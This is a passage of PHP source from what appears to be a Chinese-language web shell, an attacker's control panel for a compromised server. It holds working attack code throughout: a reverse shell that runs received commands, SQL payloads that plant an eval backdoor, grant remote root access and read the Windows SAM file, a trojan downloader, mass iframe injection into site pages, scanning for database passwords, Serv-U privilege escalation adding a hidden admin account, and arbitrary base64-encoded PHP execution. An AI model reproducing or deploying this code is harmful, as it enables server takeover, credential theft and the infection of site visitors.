551 $fp=fsockopen($mip , $bport , $errno, $errstr);
552 if (!$fp){
553 $result = "Error: could not open socket connection";
554 }else {
555 fputs ($fp ,"\n*********************************************\n
556 hacking url:http://www.google.com is ok!
557 \n*********************************************\n\n");
558 while(!feof($fp)){
559 fputs ($fp," [r00t@yzddmr6:/root]# ");
560 $result= fgets ($fp, 4096);
561 $message=`$result`;
562 fputs ($fp,"--> ".$message."\n");
563 }
564 fclose ($fp);
565 }
566 echo '</div>';
567 }
568
569 echo '<br>你可以尝试连接端口 (nc -vv -l '.$_POST['yourport'].') ';
570 }
571break;
572
573 case "sqlshell":
574 $MSG_BOX = '';
575 $mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $msql = 'select version();';
576 if(isset($_POST['mhost']) && isset($_POST['muser']))
577 {
578 $mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport'];
579 if($conn = mysql_connect($mhost.':'.$mport,$muser,$mpass)) @mysql_select_db($mdata);
580 else $MSG_BOX = '连接MYSQL失败';
581 }
582 $downfile = 'c:/windows/repair/sam';
583 if(!empty($_POST['downfile']))
584 {
585 $downfile = File_Str($_POST['downfile']);
586 $binpath = bin2hex($downfile);
587 $query = 'select load_file(0x'.$binpath.')';
588 if($result = @mysql_query($query,$conn))
589 {
590 $k = 0; $downcode = '';
591 while($row = @mysql_fetch_array($result)){$downcode .= $row[$k];$k++;}
592 $filedown = basename($downfile);
593 if(!$filedown) $filedown = 'envl.tmp';
594 $array = explode('.', $filedown);
595 $arrayend = array_pop($array);
596 header('Content-type: application/x-'.$arrayend);
597 header('Content-Disposition: attachment; filename='.$filedown);
598 header('Content-Length: '.strlen($downcode));
599 echo $downcode;
600 exit;
601 }
602 else $MSG_BOX = '下载文件失败';
603 }
604 $o = isset($_GET['o']) ? $_GET['o'] : '';
605print<<<END
606<script language="javascript">
607function nFull(i){
608 Str = new Array(11);
609 Str[0] = "select version();";
610 Str[1] = "select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C) FROM user into outfile 'D:/web/iis.txt'";
611 Str[2] = "select '<?php eval(\$_POST[cmd]);?>' into outfile 'F:/web/bak.php';";
612 Str[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;";
613 nform.msql.value = Str[i];
614 return true;
615}
616END;
617html_base();
618print<<<END
619function SubmitUrl(){
620 document.getElementById('msql').value = base64encode(document.getElementById('msql').value);
621 document.getElementById('nform').submit();
622}
623</script>
624<form method="POST" name="nform" id="nform">
625<center><div class="actall"><a href="?eanver=sqlshell">[MYSQL执行语句]</a>
626<a href="?eanver=sqlshell&o=u">[MYSQL上传文件]</a>
627<a href="?eanver=sqlshell&o=d">[MYSQL下载文件]</a></div>
628<div class="actall">
629地址 <input type="text" name="mhost" value="{$mhost}" style="width:110px">
630端口 <input type="text" name="mport" value="{$mport}" style="width:110px">
631用户 <input type="text" name="muser" value="{$muser}" style="width:110px">
632密码 <input type="text" name="mpass" value="{$mpass}" style="width:110px">
633库名 <input type="text" name="mdata" value="{$mdata}" style="width:110px">
634</div>
635<div class="actall" style="height:220px;">
636END;
637if($o == 'u')
638{
639 $uppath = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/exp.vbs';
640 if(!empty($_POST['uppath']))
641 {
642 $uppath = $_POST['uppath'];
643 $query = 'Create TABLE a (cmd text NOT NULL);';
644 if(@mysql_query($query,$conn))
645 {
646 if($tmpcode = File_Read($_FILES['upfile']['tmp_name'])){$filecode = bin2hex(File_Read($tmpcode));}
647 else{$tmp = File_Str(dirname(myaddress)).'/upfile.tmp';if(File_Up($_FILES['upfile']['tmp_name'],$tmp)){$filecode = bin2hex(File_Read($tmp));@unlink($tmp);}}
648 $query = 'Insert INTO a (cmd) VALUES(CONVERT(0x'.$filecode.',CHAR));';
649 if(@mysql_query($query,$conn))
650 {
651 $query = 'SELECT cmd FROM a INTO DUMPFILE \''.$uppath.'\';';
652 $MSG_BOX = @mysql_query($query,$conn) ? '上传文件成功' : '上传文件失败';
653 }
654 else $MSG_BOX = '插入临时表失败';
655 @mysql_query('Drop TABLE IF EXISTS a;',$conn);
656 }
657 else $MSG_BOX = '创建临时表失败';
658 }
659print<<<END
660<br><br>上传路径 <input type="text" name="uppath" value="{$uppath}" style="width:500px">
661<br><br>选择文件 <input type="file" name="upfile" style="width:500px;height:22px;">
662</div><div class="actall"><input type="submit" value="上传" style="width:80px;">
663END;
664}
665elseif($o == 'd')
666{
667print<<<END
668<br><br><br>下载文件 <input type="text" name="downfile" value="{$downfile}" style="width:500px">
669</div><div class="actall"><input type="submit" value="下载" style="width:80px;">
670END;
671}
672else
673{
674 if(!empty($_POST['msql']))
675 {
676 $msql = $_POST['msql'];
677 $msql = base64_decode($msql);
678 if($result = @mysql_query($msql,$conn))
679 {
680 $MSG_BOX = '执行SQL语句成功<br>';
681 $k = 0;
682 while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}
683 }
684 else $MSG_BOX .= mysql_error();
685 }
686print<<<END
687<textarea name="msql" id="msql" style="width:700px;height:200px;">{$msql}</textarea></div>
688<div class="actall">
689<select onchange="return nFull(options[selectedIndex].value)">
690 <option value="0" selected>显示版本</option>
691 <option value="1">导出文件</option>
692 <option value="2">写入文件</option>
693 <option value="3">开启外连</option>
694</select>
695<input type="button" value="执行" onclick="SubmitUrl();" style="width:80px;">
696END;
697}
698 if($MSG_BOX != '') echo '</div><div class="actall">'.$MSG_BOX.'</div></center></form>';
699 else echo '</div></center></form>';
700 break;
701
702 case "downloader":
703 $Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe';
704 $Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress).'/muma.exe');
705print<<<END
706 <form method="POST">
707 <div class="actall">超连接 <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div>
708 <div class="actall">下载到 <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div>
709 <div class="actall"><input value="下载" type="submit" style="width:80px;"></div></form>
710END;
711 if((!empty($_POST['durl'])) && (!empty($_POST['dpath'])))
712 {
713 echo '<div class="actall">';
714 $contents = @file_get_contents($_POST['durl']);
715 if(!$contents) echo '无法读取要下载的数据';
716 else echo File_Write($_POST['dpath'],$contents,'wb') ? '下载文件成功' : '下载文件失败';
717 echo '</div>';
718 }
719 break;
720
721 case "issql":
722 session_start();
723 if($_POST['sqluser'] && $_POST['sqlpass']){
724 $_SESSION['sql_user'] = $_POST['sqluser'];
725 $_SESSION['sql_password'] = $_POST['sqlpass'];
726 }
727 if($_POST['sqlhost']){$_SESSION['sql_host'] = $_POST['sqlhost'];}
728 else{$_SESSION['sql_host'] = 'localhost';}
729 if($_POST['sqlport']){$_SESSION['sql_port'] = $_POST['sqlport'];}
730 else{$_SESSION['sql_port'] = '3306';}
731 if($_SESSION['sql_user'] && $_SESSION['sql_password']){
732 if(!($sqlcon = @mysql_connect($_SESSION['sql_host'].':'.$_SESSION['sql_port'],$_SESSION['sql_user'],$_SESSION['sql_password']))){
733 unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']);
734 die(html_a('?eanver=sqlshell','连接失败请返回'));
735 }
736 }
737 else{
738 die(html_a('?eanver=sqlshell','连接失败请返回'));
739 }
740 $query = mysql_query("SHOW DATABASES",$sqlcon);
741 html_n('<tr><td>数据库列表:');
742 while($db = mysql_fetch_array($query)) {
743 html_a('?eanver=issql&db='.$db['Database'],$db['Database']);
744 echo ' ';
745 }
746 html_n('</td></tr>');
747 if($_GET['db']){
748 css_js("3");
749 mysql_select_db($_GET['db'], $sqlcon);
750 html_n('<tr><td><form method="POST" name="DbForm"><textarea name="sql" COLS="80" ROWS="3">'.$_POST['sql'].'</textarea><br>');
751 html_select(array(0=>"--SQL语法--",7=>"添加数据",8=>"删除数据",9=>"修改数据",10=>"建数据表",11=>"删数据表",12=>"添加字段",13=>"删除字段"),0,"onchange='return Full(options[selectedIndex].value)'");
752 html_input("submit","doquery","执行");
753 html_a("?eanver=issql&db=".$_GET['db'],$_GET['db']);
754 html_n('--->');
755 html_a("?eanver=issql&db=".$_GET['db']."&table=".$_GET['table'],$_GET['table']);
756 html_n('</form><br>');
757 if(!empty($_POST['sql'])){
758 if (@mysql_query($_POST['sql'],$sqlcon)) {
759 echo "执行SQL语句成功";
760 }else{
761 echo "出错: ".mysql_error();
762 }
763 }
764 if($_GET['table']){
765 html_n('<table border=1><tr>');
766 $query = "SHOW COLUMNS FROM ".$_GET['table'];
767 $result = mysql_query($query,$sqlcon);
768 $fields = array();
769 while($row = mysql_fetch_assoc($result)){
770 array_push($fields,$row['Field']);
771 html_n('<td><font color=#FFFF44>'.$row['Field'].'</font></td>');
772 }
773 html_n('</tr><tr>');
774 $result = mysql_query("SELECT * FROM ".$_GET['table'],$sqlcon) or die(mysql_error());
775 while($text = @mysql_fetch_assoc($result)){
776 foreach($fields as $row){
777 if($text[$row] == "") $text[$row] = 'NULL';
778 html_n('<td>'.$text[$row].'</td>');
779 }
780 echo '</tr>';
781 }
782 }
783 else{
784 $query = "SHOW TABLES FROM " . $_GET['db'];
785 $dat = mysql_query($query, $sqlcon) or die(mysql_error());
786 while ($row = mysql_fetch_row($dat)){
787 html_n("<tr><td><a href='?eanver=issql&db=".$_GET['db']."&table=".$row[0]."'>".$row[0]."</a></td></tr>");
788 }
789 }
790 }
791 break;
792
793 case "downloader":
794 $Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe';
795 $Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress).'/muma.exe');
796print<<<END
797 <form method="POST">
798 <div class="actall">超连接 <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div>
799 <div class="actall">下载到 <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div>
800 <div class="actall"><input value="下载" type="submit" style="width:80px;"></div></form>
801END;
802 if((!empty($_POST['durl'])) && (!empty($_POST['dpath'])))
803 {
804 echo '<div class="actall">';
805 $contents = @file_get_contents($_POST['durl']);
806 if(!$contents) echo '无法读取要下载的数据';
807 else echo File_Write($_POST['dpath'],$contents,'wb') ? '下载文件成功' : '下载文件失败';
808 echo '</div>';
809 }
810 break;
811
812 case "issql":
813 session_start();
814 if($_POST['sqluser'] && $_POST['sqlpass']){
815 $_SESSION['sql_user'] = $_POST['sqluser'];
816 $_SESSION['sql_password'] = $_POST['sqlpass'];
817 }
818 if($_POST['sqlhost']){$_SESSION['sql_host'] = $_POST['sqlhost'];}
819 else{$_SESSION['sql_host'] = 'localhost';}
820 if($_POST['sqlport']){$_SESSION['sql_port'] = $_POST['sqlport'];}
821 else{$_SESSION['sql_port'] = '3306';}
822 if($_SESSION['sql_user'] && $_SESSION['sql_password']){
823 if(!($sqlcon = @mysql_connect($_SESSION['sql_host'].':'.$_SESSION['sql_port'],$_SESSION['sql_user'],$_SESSION['sql_password']))){
824 unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']);
825 die(html_a('?eanver=sqlshell','连接失败请返回'));
826 }
827 }
828 else{
829 die(html_a('?eanver=sqlshell','连接失败请返回'));
830 }
831 $query = mysql_query("SHOW DATABASES",$sqlcon);
832 html_n('<tr><td>数据库列表:');
833 while($db = mysql_fetch_array($query)) {
834 html_a('?eanver=issql&db='.$db['Database'],$db['Database']);
835 echo ' ';
836 }
837 html_n('</td></tr>');
838 if($_GET['db']){
839 css_js("3");
840 mysql_select_db($_GET['db'], $sqlcon);
841 html_n('<tr><td><form method="POST" name="DbForm" id="DbForm"><textarea name="sql" id="sql" COLS="80" ROWS="3">'.$_POST['sql'].'</textarea><br>');
842 html_select(array(0=>"--SQL语法--",7=>"添加数据",8=>"删除数据",9=>"修改数据",10=>"建数据表",11=>"删数据表",12=>"添加字段",13=>"删除字段"),0,"onchange='return Full(options[selectedIndex].value)'");
843 html_input("submit","doquery","执行");
844 html_a("?eanver=issql&db=".$_GET['db'],$_GET['db']);
845 html_n('--->');
846 html_a("?eanver=issql&db=".$_GET['db']."&table=".$_GET['table'],$_GET['table']);
847 html_n('</form><br>');
848 if(!empty($_POST['sql'])){
849 if (@mysql_query($_POST['sql'],$sqlcon)) {
850 echo "执行SQL语句成功";
851 }else{
852 echo "出错: ".mysql_error();
853 }
854 }
855 if($_GET['table']){
856 html_n('<table border=1><tr>');
857 $query = "SHOW COLUMNS FROM ".$_GET['table'];
858 $result = mysql_query($query,$sqlcon);
859 $fields = array();
860 while($row = mysql_fetch_assoc($result)){
861 array_push($fields,$row['Field']);
862 html_n('<td><font color=#FFFF44>'.$row['Field'].'</font></td>');
863 }
864 html_n('</tr><tr>');
865 $result = mysql_query("SELECT * FROM ".$_GET['table'],$sqlcon) or die(mysql_error());
866 while($text = @mysql_fetch_assoc($result)){
867 foreach($fields as $row){
868 if($text[$row] == "") $text[$row] = 'NULL';
869 html_n('<td>'.$text[$row].'</td>');
870 }
871 echo '</tr>';
872 }
873 }
874 else{
875 $query = "SHOW TABLES FROM " . $_GET['db'];
876 $dat = mysql_query($query, $sqlcon) or die(mysql_error());
877 while ($row = mysql_fetch_row($dat)){
878 html_n("<tr><td><a href='?eanver=issql&db=".$_GET['db']."&table=".$row[0]."'>".$row[0]."</a></td></tr>");
879 }
880 }
881 }
882 break;
883
884 case "upfiles":
885 html_n('<tr><td>服务器限制上传单个文件大小: '.@get_cfg_var('upload_max_filesize').'<form method="POST" enctype="multipart/form-data">');
886 html_input("text","uppath",root_dir,"<br>上传到路径: ","51");
887print<<<END
888<SCRIPT language="JavaScript">
889function addTank(){
890var k=0;
891 k=k+1;
892 k=tank.rows.length;
893 newRow=document.all.tank.insertRow(-1)
894 <!--删除选择-->
895 newcell=newRow.insertCell()
896 newcell.innerHTML="<input name='tankNo' type='checkbox'> <input type='file' name='upfile[]' value='' size='50'>"
897}
898
899function delTank() {
900 if(tank.rows.length==1) return;
901 var checkit = false;
902 for (var i=0;i<document.all.tankNo.length;i++) {
903 if (document.all.tankNo[i].checked) {
904 checkit=true;
905 tank.deleteRow(i+1);
906 i--;
907 }
908 }
909 if (checkit) {
910 } else{
911 alert("请选择一个要删除的对象");
912 return false;
913 }
914}
915</SCRIPT>
916<br><br>
917<table cellSpacing=0 cellPadding=0 width="100%" border=0>
918 <tr>
919 <td width="7%"><input class="button01" type="button" onclick="addTank()" value=" 添 加 " name="button2"/>
920 <input name="button3" type="button" class="button01" onClick="delTank()" value="删除" />
921 </td>
922 </tr>
923</table>
924<table id="tank" width="100%" border="0" cellpadding="1" cellspacing="1" >
925<tr><td>请选择要上传的文件:</td></tr>
926<tr><td><input name='tankNo' type='checkbox'> <input type='file' name='upfile[]' value='' size='50'></td></tr>
927</table>
928END;
929 html_n('<br><input type="submit" name="upfiles" value="上传" style="width:80px;"> <input type="button" value="返回" onclick="window.location=\'?eanver=main&path='.root_dir.'\';" style="width:80px;">');
930 if($_POST['upfiles']){
931 foreach ($_FILES["upfile"]["error"] as $key => $error){
932 if ($error == UPLOAD_ERR_OK){
933 $tmp_name = $_FILES["upfile"]["tmp_name"][$key];
934 $name = $_FILES["upfile"]["name"][$key];
935 $uploadfile = str_path($_POST['uppath'].'/'.$name);
936 $upload = @copy($tmp_name,$uploadfile) ? $name.$msg[2] : @move_uploaded_file($tmp_name,$uploadfile) ? $name.$msg[2] : $name.$msg[3];
937 echo '<br><br>'.$upload;
938 }
939 }
940 }
941 html_n('</form>');
942 break;
943
944 case "guama":
945 $patht = isset($_POST['path']) ? $_POST['path'] : root_dir;
946 $typet = isset($_POST['type']) ? $_POST['type'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx";
947 $codet = isset($_POST['code']) ? $_POST['code'] : "<iframe src=\"http://localhost/eanver.htm\" width=\"1\" height=\"1\"></iframe>";
948 html_n('<tr><td>文件类型请用"|"隔开,也可以是指定文件名.<form method="POST"><br>');
949 html_input("text","path",$patht,"路径范围","45");
950 html_input("checkbox","pass","","使用目录遍历","",true);
951 html_input("text","type",$typet,"<br><br>文件类型","60");
952 html_text("code","67","5",$codet);
953 html_n('<br><br>');
954 html_radio("批量挂马","批量清马","guama","qingma");
955 html_input("submit","passreturn","开始");
956 html_n('</td></tr></form>');
957 if(!empty($_POST['path'])){
958 html_n('<tr><td>目标文件:<br><br>');
959 if(isset($_POST['pass'])) $bool = true; else $bool = false;
960 do_passreturn($patht,$codet,$_POST['return'],$bool,$typet);
961 }
962 break;
963
964 case "tihuan":
965 html_n('<tr><td>此功能可批量替换文件内容,请小心使用.<br><br><form method="POST">');
966 html_input("text","path",root_dir,"路径范围","45");
967 html_input("checkbox","pass","","使用目录遍历","",true);
968 html_text("newcode","67","5",$_POST['newcode']);
969 html_n('<br><br>替换为');
970 html_text("oldcode","67","5",$_POST['oldcode']);
971 html_input("submit","passreturn","替换","<br><br>");
972 html_n('</td></tr></form>');
973 if(!empty($_POST['path'])){
974 html_n('<tr><td>目标文件:<br><br>');
975 if(isset($_POST['pass'])) $bool = true; else $bool = false;
976 do_passreturn($_POST['path'],$_POST['newcode'],"tihuan",$bool,$_POST['oldcode']);
977 }
978 break;
979
980 case "scanfile":
981 css_js("4");
982 html_n('<tr><td>此功能可很方便的搜索到保存MYSQL用户密码的配置文件,用于提权.<br>当服务器文件太多时,会影响执行速度,不建议使用目录遍历.<form method="POST" name="sform"><br>');
983 html_input("text","path",root_dir,"路径名","45");
984 html_input("checkbox","pass","","使用目录遍历","",true);
985 html_input("text","code",$_POST['code'],"<br><br>关键字","40");
986 html_select(array("--MYSQL配置文件--","Discuz","PHPWind","phpcms","dedecms","PHPBB","wordpress","sa-blog","o-blog"),0,"onchange='return Fulll(options[selectedIndex].value)'");
987 html_n('<br><br>');
988 html_radio("搜索文件名","搜索包含文字","scanfile","scancode");
989 html_input("submit","passreturn","搜索");
990 html_n('</td></tr></form>');
991 if(!empty($_POST['path'])){
992 html_n('<tr><td>找到文件:<br><br>');
993 if(isset($_POST['pass'])) $bool = true; else $bool = false;
994 do_passreturn($_POST['path'],$_POST['code'],$_POST['return'],$bool);
995 }
996 break;
997
998 case "scanphp":
999 html_n('<tr><td>原理是根据特征码定义的,请查看代码判断后再进行删除.<form method="POST"><br>');
1000 html_input("text","path",root_dir,"查找范围","40");
1001 html_input("checkbox","pass","","使用目录遍历<br><br>脚本类型","",true);
1002 html_select(array("php" => "PHP","asp" => "ASP","aspx" => "ASPX","jsp" => "JSP"));
1003 html_input("submit","passreturn","查找","<br><br>");
1004 html_n('</td></tr></form>');
1005 if(!empty($_POST['path'])){
1006 html_n('<tr><td>找到文件:<br><br>');
1007 if(isset($_POST['pass'])) $bool = true; else $bool = false;
1008 do_passreturn($_POST['path'],$_POST['class'],"scanphp",$bool);
1009 }
1010 break;
1011
1012 case "port":
1013 $Port_ip = isset($_POST['ip']) ? $_POST['ip'] : '127.0.0.1';
1014 $Port_port = isset($_POST['port']) ? $_POST['port'] : '21|23|25|80|110|135|139|445|1433|3306|3389|8080|43958|5631|2049|873|999';
1015print<<<END
1016<form method="POST">
1017<div class="actall">扫描IP <input type="text" name="ip" value="{$Port_ip}" style="width:600px;"> </div>
1018<div class="actall">端口号 <input type="text" name="port" value="{$Port_port}" style="width:597px;"></div>
1019<div class="actall"><input type="submit" value="扫描" style="width:80px;"></div>
1020</form>
1021END;
1022 if((!empty($_POST['ip'])) && (!empty($_POST['port'])))
1023 {
1024 echo '<div class="actall">';
1025 $ports = explode('|', $_POST['port']);
1026 for($i = 0;$i < count($ports);$i++)
1027 {
1028 $fp = @fsockopen($_POST['ip'],$ports[$i],$errno,$errstr,2);
1029 echo $fp ? '<font color="#FF0000">开放端口 ---> '.$ports[$i].'</font><br>' : '关闭端口 ---> '.$ports[$i].'<br>';
1030 ob_flush();
1031 flush();
1032 }
1033 echo '</div>';
1034 }
1035 break;
1036
1037
1038 case "getcode":
1039if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b>获取 URL 内容失败</b></p></center></body>";exit;}
1040print<<<END
1041<table width="100%" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
1042 <form method="POST" target="proxyframe">
1043 <tr class="firstalt">
1044 <td align="center"><b>在线代理</b></td>
1045 </tr>
1046 <tr class="secondalt">
1047 <td align="center" ><br><ul><li>用本功能仅实现简单的 HTTP 代理,不会显示使用相对路径的图片、链接及CSS样式表.</li><li>用本功能可以通过本服务器浏览目标URL,但不支持 SQL Injection 探测以及某些特殊字符.</li><li>用本功能浏览的 URL,在目标主机上留下的IP记录是 : {$_SERVER['SERVER_NAME']}</li></ul></td>
1048 </tr>
1049 <tr class="firstalt">
1050 <td align="center" height=40 >URL: <input name="url" value="about:blank" type="text" class="input" size="100" >
1051 <input name="" value="浏览" type="submit" class="input" size="30" >
1052</td>
1053 </tr>
1054 <tr class="secondalt">
1055 <td align="center" ><iframe name="proxyframe" frameborder="0" width="765" height="400" marginheight="0" marginwidth="0" scrolling="auto" src="about:blank"></iframe></td>
1056 </tr>
1057</form></table>
1058END;
1059 break;
1060
1061 case "servu":
1062 $SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P';
1063print<<<END
1064<div class="actall"><a href="?eanver=servu">[执行命令]</a> <a href="?eanver=servu&o=adduser">[添加用户]</a></div>
1065<form method="POST">
1066 <div class="actall">ServU端口 <input name="SUPort" type="text" value="43958" style="width:300px"></div>
1067 <div class="actall">ServU用户 <input name="SUUser" type="text" value="LocalAdministrator" style="width:300px"></div>
1068 <div class="actall">ServU密码 <input name="SUPass" type="text" value="{$SUPass}" style="width:300px"></div>
1069END;
1070if($_GET['o'] == 'adduser')
1071{
1072print<<<END
1073<div class="actall">帐号 <input name="user" type="text" value="mysql$" style="width:200px">
1074密码 <input name="password" type="text" value="envl" style="width:200px">
1075目录 <input name="part" type="text" value="C:\\\\" style="width:200px"></div>
1076END;
1077}
1078else
1079{
1080print<<<END
1081<div class="actall">提权命令 <input name="SUCommand" type="text" value="net user mysql$ envl /add & net localgroup administrators mysql$ /add" style="width:600px"><br>
1082<input name="user" type="hidden" value="envl">
1083<input name="password" type="hidden" value="envl">
1084<input name="part" type="hidden" value="C:\\\\"></div>
1085END;
1086}
1087echo '<div class="actall"><input type="submit" value="执行" style="width:80px;"></div></form>';
1088 if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass'])))
1089 {
1090 echo '<div class="actall">';
1091 $sendbuf = "";
1092 $recvbuf = "";
1093 $domain = "-SETDOMAIN\r\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n"."-TZOEnable=0\r\n"." TZOKey=\r\n";
1094 $adduser = "-SETUSERSETUP\r\n"."-IP=0.0.0.0\r\n"."-PortNo=21\r\n"."-User=".$_POST['user']."\r\n"."-Password=".$_POST['password']."\r\n"."-HomeDir=c:\\\r\n"."-LoginMesFile=\r\n"."-Disable=0\r\n"."-RelPaths=1\r\n"."-NeedSecure=0\r\n"."-HideHidden=0\r\n"."-AlwaysAllowLogin=0\r\n"."-ChangePassword=0\r\n".
1095 "-QuotaEnable=0\r\n"."-MaxUsersLoginPerIP=-1\r\n"."-SpeedLimitUp=0\r\n"."-SpeedLimitDown=0\r\n"."-MaxNrUsers=-1\r\n"."-IdleTimeOut=600\r\n"."-SessionTimeOut=-1\r\n"."-Expire=0\r\n"."-RatioUp=1\r\n"."-RatioDown=1\r\n"."-RatiosCredit=0\r\n"."-QuotaCurrent=0\r\n"."-QuotaMaximum=0\r\n".
1096 "-Maintenance=None\r\n"."-PasswordType=Regular\r\n"."-Ratios=None\r\n"." Access=".$_POST['part']."\|RWAMELCDP\r\n";
1097 $deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n";
1098 $sock = @fsockopen("127.0.0.1", $_POST["SUPort"],$errno,$errstr, 10);
1099 $recvbuf = @fgets($sock, 1024);
1100 echo "返回数据包: $recvbuf <br>";
1101 $sendbuf = "USER ".$_POST["SUUser"]."\r\n";
1102 @fputs($sock, $sendbuf, strlen($sendbuf));
1103 echo "发送数据包: $sendbuf <br>";
1104 $recvbuf = @fgets($sock, 1024);
1105 echo "返回数据包: $recvbuf <br>";
1106 $sendbuf = "PASS ".$_POST["SUPass"]."\r\n";
1107 @fputs($sock, $sendbuf, strlen($sendbuf));
1108 echo "发送数据包: $sendbuf <br>";
1109 $recvbuf = @fgets($sock, 1024);
1110 echo "返回数据包: $recvbuf <br>";
1111 $sendbuf = "SITE MAINTENANCE\r\n";
1112 @fputs($sock, $sendbuf, strlen($sendbuf));
1113 echo "发送数据包: $sendbuf <br>";
1114 $recvbuf = @fgets($sock, 1024);
1115 echo "返回数据包: $recvbuf <br>";
1116 $sendbuf = $domain;
1117 @fputs($sock, $sendbuf, strlen($sendbuf));
1118 echo "发送数据包: $sendbuf <br>";
1119 $recvbuf = @fgets($sock, 1024);
1120 echo "返回数据包: $recvbuf <br>";
1121 $sendbuf = $adduser;
1122 @fputs($sock, $sendbuf, strlen($sendbuf));
1123 echo "发送数据包: $sendbuf <br>";
1124 $recvbuf = @fgets($sock, 1024);
1125 echo "返回数据包: $recvbuf <br>";
1126 if(!empty($_POST['SUCommand']))
1127 {
1128 $exp = @fsockopen("127.0.0.1", "21",$errno,$errstr, 10);
1129 $recvbuf = @fgets($exp, 1024);
1130 echo "返回数据包: $recvbuf <br>";
1131 $sendbuf = "USER ".$_POST['user']."\r\n";
1132 @fputs($exp, $sendbuf, strlen($sendbuf));
1133 echo "发送数据包: $sendbuf <br>";
1134 $recvbuf = @fgets($exp, 1024);
1135 echo "返回数据包: $recvbuf <br>";
1136 $sendbuf = "PASS ".$_POST['password']."\r\n";
1137 @fputs($exp, $sendbuf, strlen($sendbuf));
1138 echo "发送数据包: $sendbuf <br>";
1139 $recvbuf = @fgets($exp, 1024);
1140 echo "返回数据包: $recvbuf <br>";
1141 $sendbuf = "site exec ".$_POST["SUCommand"]."\r\n";
1142 @fputs($exp, $sendbuf, strlen($sendbuf));
1143 echo "发送数据包: site exec <font color=#006600>".$_POST["SUCommand"]."</font> <br>";
1144 $recvbuf = @fgets($exp, 1024);
1145 echo "返回数据包: $recvbuf <br>";
1146 $sendbuf = $deldomain;
1147 @fputs($sock, $sendbuf, strlen($sendbuf));
1148 echo "发送数据包: $sendbuf <br>";
1149 $recvbuf = @fgets($sock, 1024);
1150 echo "返回数据包: $recvbuf <br>";
1151 @fclose($exp);
1152 }
1153 @fclose($sock);
1154 echo '</div>';
1155 }
1156 break;
1157
1158 case "phpcode":
1159 $phpcode = isset($_POST['phpcode']) ? $_POST['phpcode'] : "phpinfo();";
1160 if($phpcode!='phpinfo();')$phpcode = htmlspecialchars(base64_decode($phpcode));
1161 echo '<script language="javascript">';
1162 html_base();
1163 echo 'function SubmitUrl(){
1164 document.getElementById(\'phpcode\').value = base64encode(document.getElementById(\'phpcode\').value);
1165 document.getElementById(\'sendcode\').submit();
1166 }</script><tr><td><form method="POST" id="sendcode" >不用写<? ?>标签,此功能优化使用BASE64加密传送,防止恶意代码被拦,用了就知道(小小细节,注定成就)<br><br><textarea COLS="120" ROWS="35" name="phpcode" id="phpcode">'.$phpcode.'</textarea><br><br><input type="button" value="执行" onclick="SubmitUrl();" style="width:80px;">';
1167 if(!empty($_POST['phpcode'])){
1168 echo "<br><br>";
1169 eval(stripslashes(base64_decode($_POST['phpcode'])));
1170 }
1171 html_n('</form>');
1172 break;
1173
1174 case "myexp":
1175 $MSG_BOX = '请先导出DLL,再执行命令.MYSQL用户必须为root权限,导出路径必须能加载DLL文件.';
1176 $info = '命令回显';
1177 $mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $mpath = ''; $sqlcmd = 'ver';
1178 if(isset($_POST['mhost']) && isset($_POST['muser']))
1179 {
1180 @$mysql64 = isset($_POST['mysql64'])?true:false;if($mysql64){$mysql64='checked';$BH='BH64.dll';}else{$BH='BH.dll';} $mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; $mpath = File_Str($_POST['mpath']); $sqlcmd = $_POST['sqlcmd'];
1181 $conn = mysql_connect($mhost.':'.$mport,$muser,$mpass);
1182 if($conn)
1183 {
1184 @mysql_select_db($mdata);
1185 /*************************************/
1186 $str=mysql_get_server_info();
1187 //echo 'MYSQL版本:'.$str." ";
1188
1189 if($str[2]>=1){
1190 $sql="SHOW VARIABLES LIKE '%plugin_dir%'";
1191 $row=mysql_query($sql,$conn);
1192 $rows=mysql_fetch_row($row);
1193 $pa=str_replace('\\','/',$rows[1]);
1194 $path=$pa.'/'.$BH;
1195
1196 }else{
1197 $path='C:/WINDOWS/'.$BH;
1198 }
1199 //$mpath=$path;
1200 if(!empty($mpath))
1201 {
1202 $mpath=$mpath;
1203 }else{
1204 $mpath=$path;
1205 }
1206 /*************************************/
1207 if((!empty($_POST['outdll'])) && (!empty($mpath)))
1208 {
1209 $query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);";
1210 if(@mysql_query($query,$conn))
1211 {
1212 $shellcode = $mysql64?Mysql_shellcode64():Mysql_shellcode();
1213 $query = "INSERT into Envl_Temp_Tab values (CONVERT(".$shellcode.",CHAR));";
